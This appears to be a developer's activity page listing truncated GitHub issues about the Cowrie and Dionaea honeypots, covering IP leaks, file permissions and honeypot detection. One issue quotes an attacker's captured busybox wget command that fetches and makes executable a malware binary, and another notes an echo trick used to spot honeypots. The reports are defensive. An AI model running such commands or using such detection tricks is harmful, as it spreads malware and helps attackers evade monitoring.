fe7ch
fe7ch
Basically, there is just couple lines of code: 1. Forward input parameter from TftpClient to TftpContext 2. After creating a socket in TftpContext bind it to the passed address
I'm writing an IDAPython script that does some patching with the code. While running the keypatch sometimes fails on the code like this: ``` mov [rsp-28h+var_s20], rbp ``` That translates...
wget command leaks real cowrie server IP if a redirect is found (?). An attacker executed the following command: ``` /bin/busybox wget http://206.189.179.28:80/bins/sora.arm7 -O - > 19ju3d; /bin/busybox chmod 777...
tftpy library used for handling of tftp command leaks real cowrie server IP. I've created an issue for tftpy (https://github.com/msoulier/tftpy/issues/88) to allow specifing interface to bind to. When it will...
Drops for most download/upload events are created with a call `open('filename', 'wb')` that results in a file being created with permissions that reflects umask parameter specified in bin/cowrie. However, files...
Currently, if you invoke `echo -ne 'asd' || echo -ne 'dsa'` on a cowrie box, you'll see "asddsa". Real system produces only "asd". This trick is used in-the-wild for honeypot...
##### ISSUE TYPE - Bug Report ##### DIONAEA VERSION ``` Clonned from master ``` ##### CONFIGURATION ``` - name: smb config: ## Generic setting ## # 1:"Windows XP Service Pack...
I've noticed that sometimes attacker is only executing some commands instead of dropping binary directly. The commands usually includes wget/curl call, so it would be nice to parse the command...